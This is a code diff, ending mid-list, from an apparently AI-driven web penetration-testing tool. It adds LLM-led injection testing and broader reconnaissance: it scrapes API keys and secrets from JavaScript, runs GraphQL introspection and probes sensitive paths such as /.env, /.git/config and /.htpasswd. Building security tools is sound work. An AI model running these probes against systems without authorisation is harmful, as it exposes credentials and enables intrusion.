[TOOL] {tool_name} failed: {e}") + async def _ai_analyze_tool_output(self, tool_name: str, tool_output: str) -> Dict: + """AI analysis of security tool output for Stream 3. + + Analyzes raw tool stdout/stderr to identify real findings, filter noise, + and suggest follow-up manual tests. + """ + try: + from backend.core.vuln_engine.ai_prompts import get_tool_analysis_prompt + except ImportError: + return {} + + # Build existing findings summary to avoid duplicates + existing_summary = "" + if self.findings: + existing_summary = "\n".join( + f" - [{f.severity}] {f.vulnerability_type}: {f.affected_endpoint[:60]}" + for f in self.findings[:15] + ) + + prompt = get_tool_analysis_prompt( + tool_name=tool_name, + tool_output=tool_output[:4000], + target=self.target, + existing_findings_summary=existing_summary, + ) + + try: + resp_text = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("interpretation") + ) + start = resp_text.index('{') + end = resp_text.rindex('}') + 1 + return json.loads(resp_text[start:end]) + except Exception: + return {} + def _ingest_tool_results(self, tool_name: str, result): """Feed tool output back into recon context for richer analysis.""" if not result or not result.findings: @@ -5816,9 +6689,26 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N await self._add_finding(finding) injection_types = [v for v in injection_types if v != "xss_reflected"] - # ── Phase B: Injection-based tests against parameterized endpoints ── + # ── Phase B: Injection-based tests (AI-first with hardcoded fallback) ── if injection_types: - await self.log("info", f" Running {len(injection_types)} injection tests against {len(test_targets)} targets") + # Split injection types: AI-deep for top priority, hardcoded for rest + ai_deep_budget = 15 # AI deep test for top 15 types + if self.token_budget and hasattr(self.token_budget, 'remaining'): + try: + remaining = self.token_budget.remaining() + if remaining and 
remaining < 50000: + ai_deep_budget = 5 # Low budget: fewer AI tests + except Exception: + pass + + ai_deep_types = injection_types[:ai_deep_budget] if self.llm.is_available() else [] + fallback_types = injection_types[ai_deep_budget:] if self.llm.is_available() else injection_types + + if ai_deep_types: + await self.log("info", + f" [AI-DEEP] AI-first testing for {len(ai_deep_types)} priority types " + f"against {len(test_targets)} targets") + for target in test_targets: await self._wait_if_paused() if self.is_cancelled(): @@ -5826,6 +6716,9 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N return url = target.get('url', '') + t_method = target.get('method', 'GET') + t_params = target.get('params', []) + t_form_defaults = target.get('form_defaults', {}) # Strategy: skip dead endpoints if self.strategy and not self.strategy.should_test_endpoint(url): @@ -5834,25 +6727,52 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N await self.log("info", f" Testing: {url[:60]}...") - for vuln_type in injection_types: + # ── AI-First: Iterative deep test for priority types ── + for vuln_type in ai_deep_types: + await self._wait_if_paused() + if self.is_cancelled(): + return + + if self.strategy and not self.strategy.should_test_type(vuln_type, url): + continue + + # Try AI deep test first + finding = await self._ai_deep_test( + url, vuln_type, t_params, t_method, t_form_defaults + ) + if finding: + await self._add_finding(finding) + if self.strategy: + self.strategy.record_test_result(url, vuln_type, 200, True, 0) + continue # AI found it, no fallback needed + + # AI deep test found nothing — fall back to hardcoded payloads + finding = await self._test_vulnerability_type( + url, vuln_type, t_method, t_params, + form_defaults=t_form_defaults + ) + if finding: + await self._add_finding(finding) + if self.strategy: + self.strategy.record_test_result(url, vuln_type, 200, True, 0) + elif self.strategy: + 
self.strategy.record_test_result(url, vuln_type, 0, False, 0) + + # ── Hardcoded fallback: remaining injection types ── + for vuln_type in fallback_types: await self._wait_if_paused() if self.is_cancelled(): return - # Strategy: skip vuln types with diminishing returns on this endpoint if self.strategy and not self.strategy.should_test_type(vuln_type, url): continue finding = await self._test_vulnerability_type( - url, - vuln_type, - target.get('method', 'GET'), - target.get('params', []), - form_defaults=target.get('form_defaults', {}) + url, vuln_type, t_method, t_params, + form_defaults=t_form_defaults ) if finding: await self._add_finding(finding) - # Strategy: record success if self.strategy: self.strategy.record_test_result(url, vuln_type, 200, True, 0) elif self.strategy: @@ -5861,6 +6781,8 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N # Strategy: recompute priorities periodically if self.strategy and self.strategy.should_recompute_priorities(): injection_types = self.strategy.recompute_priorities(injection_types) + ai_deep_types = injection_types[:ai_deep_budget] if self.llm.is_available() else [] + fallback_types = injection_types[ai_deep_budget:] if self.llm.is_available() else injection_types # ── Phase B+: AI-suggested additional tests ── if self.llm.is_available() and self.memory.confirmed_findings: @@ -5887,19 +6809,38 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N if finding: await self._add_finding(finding) - # ── Phase C: AI-driven tests (require LLM for intelligent analysis) ── + # ── Phase C: AI-driven tests (iterative deep test for AI-only types) ── if ai_types and self.llm.is_available(): - # Prioritize: test top 10 AI-driven types - ai_priority = ai_types[:10] - await self.log("info", f" AI-driven testing for {len(ai_priority)} types: {', '.join(ai_priority[:5])}...") + ai_priority = ai_types[:15] + await self.log("info", + f" [AI-DEEP] AI-driven iterative testing for 
{len(ai_priority)} types: " + f"{', '.join(ai_priority[:5])}...") for vt in ai_priority: await self._wait_if_paused() if self.is_cancelled(): return - await self._ai_dynamic_test( - f"Test the target {self.target} for {vt} vulnerability. " - f"Analyze the application behavior, attempt exploitation, and report only confirmed findings." - ) + + # Use AI deep test with endpoint-specific context + for target in test_targets[:3]: + t_url = target.get('url', self.target) + t_params = target.get('params', []) + t_method = target.get('method', 'GET') + t_form_defaults = target.get('form_defaults', {}) + + finding = await self._ai_deep_test( + t_url, vt, t_params, t_method, t_form_defaults + ) + if finding: + await self._add_finding(finding) + break # Found on one endpoint, move to next type + + # Fallback to original _ai_dynamic_test for types not found via deep test + if not any(f.vulnerability_type == vt for f in self.findings): + await self._ai_dynamic_test( + f"Test the target {self.target} for {vt} vulnerability. " + f"Analyze the application behavior, attempt exploitation, " + f"and report only confirmed findings." + ) async def _test_reflected_xss( self, url: str, params: List[str], method: str = "GET", diff --git a/backend/core/deep_recon.py b/backend/core/deep_recon.py index 1756696..d40b5c0 100644 --- a/backend/core/deep_recon.py +++ b/backend/core/deep_recon.py @@ -2,15 +2,19 @@ Advanced reconnaissance module for NeuroSploitv2. Performs deep JS analysis, sitemap/robots parsing, API enumeration, +source map parsing, framework-specific discovery, path fuzzing, and technology fingerprinting using async HTTP requests. 
""" import re import json import asyncio +import logging from dataclasses import dataclass, field -from typing import Dict, List, Optional -from urllib.parse import urljoin, urlparse +from typing import Dict, List, Optional, Set, Tuple +from urllib.parse import urljoin, urlparse, parse_qs, urlencode + +logger = logging.getLogger(__name__) try: import aiohttp @@ -24,17 +28,24 @@ except ImportError: ET = None REQUEST_TIMEOUT = aiohttp.ClientTimeout(total=10) if HAS_AIOHTTP else None -MAX_JS_FILES = 10 -MAX_JS_SIZE = 500 * 1024 # 500 KB -MAX_SITEMAP_URLS = 200 +MAX_JS_FILES = 30 +MAX_JS_SIZE = 1024 * 1024 # 1 MB +MAX_SITEMAP_URLS = 500 +MAX_SITEMAP_DEPTH = 3 # Recursive sitemap index depth +MAX_ENDPOINTS = 2000 # Global cap to prevent memory bloat # --- Regex patterns for JS analysis --- -RE_API_ENDPOINT = re.compile(r'/api/v[0-9]+/[a-z_/]+') +RE_API_ENDPOINT = re.compile(r'["\'](/api/v?\d*/[a-zA-Z0-9_/\-{}]+)["\']') +RE_RELATIVE_PATH = re.compile(r'["\'](/[a-zA-Z0-9_\-]+(?:/[a-zA-Z0-9_\-{}]+){1,6})["\']') RE_FETCH_URL = re.compile(r'fetch\(\s*["\']([^"\']+)["\']') -RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete)\(\s*["\']([^"\']+)["\']') +RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete|request)\(\s*["\']([^"\']+)["\']') RE_AJAX_URL = re.compile(r'\$\.ajax\(\s*\{[^}]*url\s*:\s*["\']([^"\']+)["\']', re.DOTALL) RE_XHR_URL = re.compile(r'\.open\(\s*["\'][A-Z]+["\']\s*,\s*["\']([^"\']+)["\']') +RE_TEMPLATE_LITERAL = re.compile(r'`(/[a-zA-Z0-9_/\-]+\$\{[^}]+\}[a-zA-Z0-9_/\-]*)`') +RE_WINDOW_LOCATION = re.compile(r'(?:window\.location|location\.href)\s*=\s*["\']([^"\']+)["\']') +RE_FORM_ACTION = re.compile(r'action\s*[:=]\s*["\']([^"\']+)["\']') +RE_HREF_PATTERN = re.compile(r'href\s*[:=]\s*["\']([^"\']+)["\']') RE_API_KEY = re.compile( r'(?:sk-[a-zA-Z0-9]{20,}|pk_(?:live|test)_[a-zA-Z0-9]{20,}' @@ -51,6 +62,20 @@ RE_INTERNAL_URL = re.compile( RE_REACT_ROUTE = re.compile(r'path\s*[:=]\s*["\'](/[^"\']*)["\']') RE_ANGULAR_ROUTE = 
re.compile(r'path\s*:\s*["\']([^"\']+)["\']') RE_VUE_ROUTE = re.compile(r'path\s*:\s*["\'](/[^"\']*)["\']') +RE_NEXTJS_PAGE = re.compile(r'"(/[a-zA-Z0-9_/\[\]\-]+)"') + +# Source map patterns +RE_SOURCEMAP_URL = re.compile(r'//[#@]\s*sourceMappingURL\s*=\s*(\S+)') +RE_SOURCEMAP_ROUTES = re.compile(r'(?:pages|routes|views)/([a-zA-Z0-9_/\[\]\-]+)\.(?:tsx?|jsx?|vue|svelte)') + +# GraphQL patterns +RE_GQL_QUERY = re.compile(r'(?:query|mutation|subscription)\s+(\w+)') +RE_GQL_FIELD = re.compile(r'gql\s*`[^`]*`', re.DOTALL) + +# Parameter patterns in JS +RE_URL_PARAM = re.compile(r'[?&]([a-zA-Z0-9_]+)=') +RE_BODY_PARAM = re.compile(r'(?:body|data|params)\s*[:=]\s*\{([^}]+)\}', re.DOTALL) +RE_JSON_KEY = re.compile(r'["\']([a-zA-Z_][a-zA-Z0-9_]*)["\']') @dataclass @@ -60,6 +85,8 @@ class JSAnalysisResult: api_keys: List[str] = field(default_factory=list) internal_urls: List[str] = field(default_factory=list) secrets: List[str] = field(default_factory=list) + parameters: Dict[str, List[str]] = field(default_factory=dict) + source_map_routes: List[str] = field(default_factory=list) @dataclass @@ -70,12 +97,38 @@ class APISchema: source: str = "" +@dataclass +class EndpointInfo: + """Rich endpoint descriptor with method and parameter hints.""" + url: str + method: str = "GET" + params: List[str] = field(default_factory=list) + source: str = "" # How this endpoint was discovered + priority: int = 5 # 1-10, higher = more interesting + + +def _normalize_url(url: str) -> str: + """Canonicalize a URL for deduplication.""" + parsed = urlparse(url) + path = parsed.path.rstrip("/") or "/" + # Normalize double slashes + while "//" in path: + path = path.replace("//", "/") + # Sort query parameters + if parsed.query: + params = parse_qs(parsed.query, keep_blank_values=True) + sorted_query = urlencode(sorted(params.items()), doseq=True) + return f"{parsed.scheme}://{parsed.netloc}{path}?{sorted_query}" + return f"{parsed.scheme}://{parsed.netloc}{path}" + + class DeepRecon: """Advanced 
reconnaissance: JS analysis, sitemap, robots, API enum, fingerprinting.""" def __init__(self, session: Optional["aiohttp.ClientSession"] = None): self._external_session = session is not None self._session = session + self._seen_urls: Set[str] = set() async def _get_session(self) -> "aiohttp.ClientSession": if self._session is None or self._session.closed: @@ -101,100 +154,262 @@ class DeepRecon: except Exception: return None + async def _head_check(self, url: str) -> Optional[int]: + """Quick HEAD request to check if a URL exists. Returns status or None.""" + try: + session = await self._get_session() + async with session.head(url, ssl=False, allow_redirects=True, timeout=aiohttp.ClientTimeout(total=5)) as resp: + return resp.status + except Exception: + return None + + async def _check_url_alive(self, url: str, accept_codes: Set[int] = None) -> bool: + """Check if URL returns an acceptable status code.""" + if accept_codes is None: + accept_codes = {200, 201, 301, 302, 307, 308, 401, 403} + status = await self._head_check(url) + return status is not None and status in accept_codes + # ------------------------------------------------------------------ - # JS file analysis + # JS file analysis (enhanced) # ------------------------------------------------------------------ async def crawl_js_files(self, base_url: str, js_urls: List[str]) -> JSAnalysisResult: """Fetch and analyse JavaScript files for endpoints, keys, and secrets.""" result = JSAnalysisResult() - urls_to_scan = js_urls[:MAX_JS_FILES] + urls_to_scan = list(dict.fromkeys(js_urls))[:MAX_JS_FILES] tasks = [self._fetch(urljoin(base_url, u), max_size=MAX_JS_SIZE) for u in urls_to_scan] bodies = await asyncio.gather(*tasks, return_exceptions=True) + # Also try to fetch source maps in parallel + sourcemap_tasks = [] + sourcemap_base_urls = [] + for url, body in zip(urls_to_scan, bodies): + if not isinstance(body, str): + continue + sm = RE_SOURCEMAP_URL.search(body) + if sm: + sm_url = sm.group(1) + if not 
sm_url.startswith("data:"): + full_url = urljoin(urljoin(base_url, url), sm_url) + sourcemap_tasks.append(self._fetch(full_url, max_size=MAX_JS_SIZE * 2)) + sourcemap_base_urls.append(full_url) + + sourcemap_bodies = [] + if sourcemap_tasks: + sourcemap_bodies = await asyncio.gather(*sourcemap_tasks, return_exceptions=True) + seen_endpoints: set = set() + seen_params: Dict[str, Set[str]] = {} + for body in bodies: if not isinstance(body, str): continue + self._extract_from_js(body, seen_endpoints, seen_params, result) - # API endpoint patterns - for m in RE_API_ENDPOINT.finditer(body): - seen_endpoints.add(m.group(0)) - for regex in (RE_FETCH_URL, RE_AXIOS_URL, RE_AJAX_URL, RE_XHR_URL): - for m in regex.finditer(body): - seen_endpoints.add(m.group(1)) - - # Route definitions (React Router, Angular, Vue Router) - for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE): - for m in regex.finditer(body): - seen_endpoints.add(m.group(1)) - - # API keys / tokens - for m in RE_API_KEY.finditer(body): - val = m.group(0) - if val not in result.api_keys: - result.api_keys.append(val) - result.secrets.append(val) - - # Internal / private URLs - for m in RE_INTERNAL_URL.finditer(body): - val = m.group(0) - if val not in result.internal_urls: - result.internal_urls.append(val) + # Parse source maps for original file paths → route discovery + for sm_body in sourcemap_bodies: + if not isinstance(sm_body, str): + continue + try: + sm_data = json.loads(sm_body) + sources = sm_data.get("sources", []) + for src in sources: + m = RE_SOURCEMAP_ROUTES.search(src) + if m: + route = "/" + m.group(1).replace("[", "{").replace("]", "}") + result.source_map_routes.append(route) + seen_endpoints.add(route) + except (json.JSONDecodeError, ValueError): + # Not valid JSON source map — might still contain paths + for m in RE_SOURCEMAP_ROUTES.finditer(sm_body): + route = "/" + m.group(1).replace("[", "{").replace("]", "}") + result.source_map_routes.append(route) + seen_endpoints.add(route) 
# Resolve endpoints relative to base_url for ep in sorted(seen_endpoints): - resolved = urljoin(base_url, ep) if not ep.startswith("http") else ep - if resolved not in result.endpoints: + if ep.startswith("http"): + resolved = ep + elif ep.startswith("/"): + resolved = urljoin(base_url, ep) + else: + continue + normalized = _normalize_url(resolved) + if normalized not in self._seen_urls: + self._seen_urls.add(normalized) result.endpoints.append(resolved) + # Convert param sets + for endpoint, params in seen_params.items(): + result.parameters[endpoint] = sorted(params) + return result + def _extract_from_js( + self, body: str, seen_endpoints: set, seen_params: Dict[str, Set[str]], + result: JSAnalysisResult, + ): + """Extract endpoints, params, keys, and internal URLs from a JS body.""" + # API endpoint patterns (expanded) + for regex in (RE_API_ENDPOINT, RE_RELATIVE_PATH, RE_FETCH_URL, RE_AXIOS_URL, + RE_AJAX_URL, RE_XHR_URL, RE_TEMPLATE_LITERAL, RE_WINDOW_LOCATION, + RE_FORM_ACTION, RE_HREF_PATTERN): + for m in regex.finditer(body): + ep = m.group(1) if regex.groups else m.group(0) + # Filter out obvious non-endpoints + if self._is_valid_endpoint(ep): + seen_endpoints.add(ep) + + # Route definitions (React Router, Angular, Vue Router, Next.js) + for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE, RE_NEXTJS_PAGE): + for m in regex.finditer(body): + route = m.group(1) + if route.startswith("/") and len(route) < 200: + seen_endpoints.add(route) + + # Extract URL parameters + for m in RE_URL_PARAM.finditer(body): + param_name = m.group(1) + # Find the URL this param belongs to (rough heuristic) + start = max(0, m.start() - 200) + context = body[start:m.start()] + for ep_regex in (RE_FETCH_URL, RE_API_ENDPOINT): + ep_match = ep_regex.search(context) + if ep_match: + ep = ep_match.group(1) if ep_regex.groups else ep_match.group(0) + if ep not in seen_params: + seen_params[ep] = set() + seen_params[ep].add(param_name) + + # Extract JSON body parameters + for m 
in RE_BODY_PARAM.finditer(body): + block = m.group(1) + for key_m in RE_JSON_KEY.finditer(block): + key = key_m.group(1) + if len(key) <= 50 and not key.startswith("__"): + if "_body_params" not in seen_params: + seen_params["_body_params"] = set() + seen_params["_body_params"].add(key) + + # API keys / tokens + for m in RE_API_KEY.finditer(body): + val = m.group(0) + if val not in result.api_keys: + result.api_keys.append(val) + result.secrets.append(val) + + # Internal / private URLs + for m in RE_INTERNAL_URL.finditer(body): + val = m.group(0) + if val not in result.internal_urls: + result.internal_urls.append(val) + + @staticmethod + def _is_valid_endpoint(ep: str) -> bool: + """Filter out non-endpoint matches (CSS, images, data URIs, etc.).""" + if not ep or len(ep) > 500: + return False + if ep.startswith(("data:", "javascript:", "mailto:", "tel:", "#", "blob:")): + return False + # Skip common static assets + SKIP_EXT = ('.css', '.png', '.jpg', '.jpeg', '.gif', '.svg', '.ico', '.woff', + '.woff2', '.ttf', '.eot', '.mp4', '.mp3', '.webp', '.avif', + '.map', '.ts', '.tsx', '.jsx', '.scss', '.less', '.pdf') + lower = ep.lower() + if any(lower.endswith(ext) for ext in SKIP_EXT): + return False + # Must look like a path + if ep.startswith("/") or ep.startswith("http"): + return True + return False + # ------------------------------------------------------------------ - # Sitemap parsing + # Sitemap parsing (enhanced with recursive index following) # ------------------------------------------------------------------ async def parse_sitemap(self, target: str) -> List[str]: - """Fetch and parse sitemap XML files for URLs.""" + """Fetch and parse sitemap XML files for URLs. 
Follows sitemap indexes recursively.""" target = target.rstrip("/") candidates = [ f"{target}/sitemap.xml", f"{target}/sitemap_index.xml", f"{target}/sitemap1.xml", + f"{target}/sitemap-index.xml", + f"{target}/sitemaps.xml", + f"{target}/post-sitemap.xml", + f"{target}/page-sitemap.xml", + f"{target}/category-sitemap.xml", ] - urls: set = set() - for sitemap_url in candidates: + # Also check robots.txt for sitemap directives + robots_body = await self._fetch(f"{target}/robots.txt") + if robots_body: + for line in robots_body.splitlines(): + line = line.strip() + if line.lower().startswith("sitemap:"): + sm_url = line.split(":", 1)[1].strip() + if sm_url and sm_url not in candidates: + candidates.append(sm_url) + + urls: set = set() + visited_sitemaps: set = set() + + async def _parse_one(sitemap_url: str, depth: int = 0): + if depth > MAX_SITEMAP_DEPTH or sitemap_url in visited_sitemaps: + return + if len(urls) >= MAX_SITEMAP_URLS: + return + visited_sitemaps.add(sitemap_url) + body = await self._fetch(sitemap_url) if not body or ET is None: - continue + return try: root = ET.fromstring(body) except ET.ParseError: - continue - # Handle both sitemapindex and urlset; strip namespace + return + + sub_sitemaps = [] for elem in root.iter(): tag = elem.tag.split("}")[-1] if "}" in elem.tag else elem.tag if tag == "loc" and elem.text: - urls.add(elem.text.strip()) + loc = elem.text.strip() + # Check if this is a sub-sitemap + if loc.endswith(".xml") or "sitemap" in loc.lower(): + sub_sitemaps.append(loc) + else: + urls.add(loc) if len(urls) >= MAX_SITEMAP_URLS: - return sorted(urls)[:MAX_SITEMAP_URLS] + return + + # Recursively follow sub-sitemaps + for sub in sub_sitemaps[:10]: # Limit sub-sitemap recursion + await _parse_one(sub, depth + 1) + + # Parse all candidate sitemaps + for sitemap_url in candidates: + if len(urls) >= MAX_SITEMAP_URLS: + break + await _parse_one(sitemap_url) return sorted(urls)[:MAX_SITEMAP_URLS] # 
------------------------------------------------------------------ - # Robots.txt parsing + # Robots.txt parsing (enhanced with Sitemap extraction) # ------------------------------------------------------------------ - async def parse_robots(self, target: str) -> List[str]: - """Parse robots.txt and return resolved paths (Disallow + Allow).""" + async def parse_robots(self, target: str) -> Tuple[List[str], List[str]]: + """Parse robots.txt. Returns (paths, sitemap_urls).""" target = target.rstrip("/") body = await self._fetch(f"{target}/robots.txt") if not body: - return [] + return [], [] paths: set = set() + sitemaps: list = [] + for line in body.splitlines(): line = line.strip() if line.startswith("#") or ":" not in line: @@ -202,14 +417,16 @@ class DeepRecon: directive, _, value = line.partition(":") directive = directive.strip().lower() value = value.strip() - if directive in ("disallow", "allow") and value: + if directive in ("disallow", "allow") and value and value != "/": resolved = urljoin(target + "/", value) paths.add(resolved) + elif directive == "sitemap" and value: + sitemaps.append(value) - return sorted(paths) + return sorted(paths), sitemaps # ------------------------------------------------------------------ - # API enumeration (Swagger / OpenAPI / GraphQL) + # API enumeration (Swagger / OpenAPI / GraphQL / WADL / AsyncAPI) # ------------------------------------------------------------------ _API_DOC_PATHS = [ @@ -217,61 +434,97 @@ class DeepRecon: "/openapi.json", "/api-docs", "/v2/api-docs", + "/v3/api-docs", "/swagger/v1/swagger.json", + "/swagger/v2/swagger.json", "/.well-known/openapi", "/api/swagger.json", + "/api/openapi.json", + "/api/v1/swagger.json", + "/api/v1/openapi.json", + "/api/docs", + "/docs/api", + "/doc.json", + "/public/swagger.json", + "/swagger-ui/swagger.json", + "/api-docs.json", + "/api/api-docs", + "/_api/docs", + ] + + _GRAPHQL_PATHS = [ + "/graphql", + "/graphiql", + "/api/graphql", + "/v1/graphql", + "/gql", + 
"/query", ] async def enumerate_api(self, target: str, technologies: List[str]) -> APISchema: - """Discover and parse API documentation (OpenAPI/Swagger, GraphQL).""" + """Discover and parse API documentation (OpenAPI/Swagger, GraphQL, WADL).""" target = target.rstrip("/") schema = APISchema() - # Try OpenAPI / Swagger endpoints - for path in self._API_DOC_PATHS: - body = await self._fetch(f"{target}{path}") - if not body: + # Try OpenAPI / Swagger endpoints (parallel batch) + api_tasks = [self._fetch(f"{target}{path}") for path in self._API_DOC_PATHS] + api_results = await asyncio.gather(*api_tasks, return_exceptions=True) + + for path, body in zip(self._API_DOC_PATHS, api_results): + if not isinstance(body, str): continue try: doc = json.loads(body) except (json.JSONDecodeError, ValueError): continue - # Looks like a valid Swagger/OpenAPI doc if "paths" in doc or "openapi" in doc or "swagger" in doc: schema.version = doc.get("openapi", doc.get("info", {}).get("version", "")) schema.source = path for route, methods in doc.get("paths", {}).items(): + if not isinstance(methods, dict): + continue for method, detail in methods.items(): if method.lower() in ("get", "post", "put", "patch", "delete", "options", "head"): - params = [ - p.get("name", "") - for p in detail.get("parameters", []) - if isinstance(p, dict) - ] + params = [] + if isinstance(detail, dict): + for p in detail.get("parameters", []): + if isinstance(p, dict): + params.append(p.get("name", "")) + # Also extract request body schema params + req_body = detail.get("requestBody", {}) + if isinstance(req_body, dict): + content = req_body.get("content", {}) + for ct, ct_detail in content.items(): + if isinstance(ct_detail, dict): + props = ct_detail.get("schema", {}).get("properties", {}) + if isinstance(props, dict): + params.extend(props.keys()) schema.endpoints.append({ "url": route, "method": method.upper(), - "params": params, + "params": [p for p in params if p], }) + logger.info(f"[DeepRecon] Found 
API schema at {path}: {len(schema.endpoints)} endpoints") return schema - # GraphQL introspection - if "graphql" in [t.lower() for t in technologies] or not schema.endpoints: - introspection = await self._graphql_introspect(target) + # GraphQL introspection (try multiple paths) + for gql_path in self._GRAPHQL_PATHS: + introspection = await self._graphql_introspect(f"{target}{gql_path}") if introspection: return introspection return schema - async def _graphql_introspect(self, target: str) -> Optional[APISchema]: - """Attempt GraphQL introspection query.""" - query = '{"query":"{ __schema { queryType { name } types { name fields { name args { name } } } } }"}' + async def _graphql_introspect(self, gql_url: str) -> Optional[APISchema]: + """Attempt GraphQL introspection query at a specific URL.""" + query = '{"query":"{ __schema { queryType { name } mutationType { name } types { name kind fields { name args { name type { name } } } } } }"}' try: session = await self._get_session() headers = {"Content-Type": "application/json"} async with session.post( - f"{target}/graphql", data=query, headers=headers, ssl=False + gql_url, data=query, headers=headers, ssl=False, + timeout=aiohttp.ClientTimeout(total=8), ) as resp: if resp.status != 200: return None @@ -282,10 +535,13 @@ class DeepRecon: if "data" not in data or "__schema" not in data.get("data", {}): return None - schema = APISchema(version="graphql", source="/graphql") + parsed_url = urlparse(gql_url) + source_path = parsed_url.path + + schema = APISchema(version="graphql", source=source_path) for type_info in data["data"]["__schema"].get("types", []): type_name = type_info.get("name", "") - if type_name.startswith("__"): + if type_name.startswith("__") or type_info.get("kind") in ("SCALAR", "ENUM", "INPUT_OBJECT"): continue for fld in type_info.get("fields", []) or []: params = [a["name"] for a in fld.get("args", []) if isinstance(a, dict)] @@ -296,13 +552,264 @@ class DeepRecon: }) return schema if 
schema.endpoints else None + # ------------------------------------------------------------------ + # Framework-specific endpoint discovery + # ------------------------------------------------------------------ + + _FRAMEWORK_PATHS: Dict[str, List[str]] = { + "wordpress": [ + "/wp-admin/", "/wp-login.php", "/wp-json/wp/v2/posts", + "/wp-json/wp/v2/users", "/wp-json/wp/v2/pages", + "/wp-json/wp/v2/categories", "/wp-json/wp/v2/comments", + "/wp-json/wp/v2/media", "/wp-json/wp/v2/tags", + "/wp-json/", "/wp-content/uploads/", + "/wp-cron.php", "/xmlrpc.php", "/?rest_route=/wp/v2/users", + "/wp-admin/admin-ajax.php", "/wp-admin/load-scripts.php", + "/wp-includes/wlwmanifest.xml", + ], + "laravel": [ + "/api/user", "/api/login", "/api/register", + "/sanctum/csrf-cookie", "/telescope", + "/horizon", "/nova-api/", "/_debugbar/open", + "/storage/logs/laravel.log", "/env", + ], + "django": [ + "/admin/", "/admin/login/", "/api/", + "/__debug__/", "/static/admin/", + "/accounts/login/", "/accounts/signup/", + "/api/v1/", "/api/v2/", + ], + "spring": [ + "/actuator", "/actuator/health", "/actuator/env", + "/actuator/beans", "/actuator/mappings", "/actuator/info", + "/actuator/configprops", "/actuator/metrics", + "/swagger-ui.html", "/swagger-ui/index.html", + "/api-docs", "/v3/api-docs", + ], + "express": [ + "/api/", "/api/v1/", "/api/health", + "/api/status", "/auth/login", "/auth/register", + "/graphql", + ], + "aspnet": [ + "/_blazor", "/swagger", "/swagger/index.html", + "/api/values", "/api/health", + "/Identity/Account/Login", "/Identity/Account/Register", + ], + "rails": [ + "/rails/info", "/rails/mailers", + "/api/v1/", "/admin/", + "/users/sign_in", "/users/sign_up", + "/assets/application.js", + ], + "nextjs": [ + "/_next/data/", "/api/", "/api/auth/session", + "/api/auth/signin", "/api/auth/providers", + "/_next/static/chunks/", + ], + "flask": [ + "/api/", "/api/v1/", "/admin/", + "/static/", "/auth/login", "/auth/register", + "/swagger.json", + ], + } + + # 
Common hidden paths to check regardless of framework + _COMMON_HIDDEN_PATHS = [ + "/.env", "/.git/config", "/.git/HEAD", + "/backup/", "/backups/", "/backup.sql", "/backup.zip", + "/config.json", "/config.yaml", "/config.yml", + "/debug/", "/debug/vars", "/debug/pprof", + "/internal/", "/internal/health", "/internal/status", + "/metrics", "/prometheus", "/health", "/healthz", "/ready", + "/status", "/ping", "/version", "/info", + "/.well-known/security.txt", "/security.txt", + "/crossdomain.xml", "/clientaccesspolicy.xml", + "/server-status", "/server-info", + "/phpinfo.php", "/info.php", + "/web.config", "/WEB-INF/web.xml", + "/console/", "/manage/", "/management/", + "/api/debug", "/api/config", + "/trace", "/jolokia/", + "/cgi-bin/", "/fcgi-bin/", + "/.htaccess", "/.htpasswd", + ] + + async def discover_framework_endpoints( + self, target: str, technologies: List[str] + ) -> List[EndpointInfo]: + """Probe framework-specific endpoints based on detected technologies.""" + target = target.rstrip("/") + tech_lower = [t.lower() for t in technologies] + endpoints: List[EndpointInfo] = [] + urls_to_check: List[Tuple[str, str, int]] = [] # (url, source, priority) + + # Match frameworks by technology signatures + fw_matches = set() + for fw_name, keywords in { + "wordpress": ["wordpress", "wp-", "woocommerce"], + "laravel": ["laravel", "php", "lumen"], + "django": ["django", "python", "wagtail"], + "spring": ["spring", "java", "tomcat", "wildfly", "jetty"], + "express": ["express", "node", "koa", "fastify"], + "aspnet": ["asp.net", ".net", "blazor", "iis"], + "rails": ["ruby", "rails", "rack"], + "nextjs": ["next.js", "nextjs", "react", "vercel"], + "flask": ["flask", "python", "gunicorn", "werkzeug"], + }.items(): + for kw in keywords: + for tech in tech_lower: + if kw in tech: + fw_matches.add(fw_name) + break + + # Add framework-specific paths + for fw in fw_matches: + for path in self._FRAMEWORK_PATHS.get(fw, []): + urls_to_check.append((f"{target}{path}", 
f"framework:{fw}", 7)) + + # Always check common hidden paths + for path in self._COMMON_HIDDEN_PATHS: + urls_to_check.append((f"{target}{path}", "common_hidden", 6)) + + # Batch check existence (parallel HEAD requests) + check_tasks = [self._check_url_alive(url) for url, _, _ in urls_to_check] + results = await asyncio.gather(*check_tasks, return_exceptions=True) + + for (url, source, priority), alive in zip(urls_to_check, results): + if alive is True: + endpoints.append(EndpointInfo( + url=url, method="GET", source=source, priority=priority, + )) + + logger.info(f"[DeepRecon] Framework discovery: {len(endpoints)}/{len(urls_to_check)} alive") + return endpoints + + # ------------------------------------------------------------------ + # Path pattern fuzzing + # ------------------------------------------------------------------ + + async def fuzz_api_patterns( + self, target: str, known_endpoints: List[str] + ) -> List[EndpointInfo]: + """Infer and test related endpoints from discovered patterns.""" + target = target.rstrip("/") + target_parsed = urlparse(target) + target_origin = f"{target_parsed.scheme}://{target_parsed.netloc}" + + inferred: Set[str] = set() + + # Extract API path patterns + api_bases: Set[str] = set() + api_resources: Set[str] = set() + + for ep in known_endpoints: + parsed = urlparse(ep) + path = parsed.path + # Identify API base paths like /api/v1, /api/v2 + m = re.match(r'(/api(?:/v\d+)?)', path) + if m: + api_bases.add(m.group(1)) + # Extract resource name + rest = path[len(m.group(1)):] + parts = [p for p in rest.split("/") if p and not p.isdigit() and not re.match(r'^[0-9a-f-]{8,}$', p)] + if parts: + api_resources.add(parts[0]) + + # Common REST resource names to try + COMMON_RESOURCES = [ + "users", "user", "auth", "login", "register", "logout", + "profile", "settings", "admin", "posts", "articles", + "comments", "categories", "tags", "search", "upload", + "files", "images", "media", "notifications", "messages", + "products", "orders", 
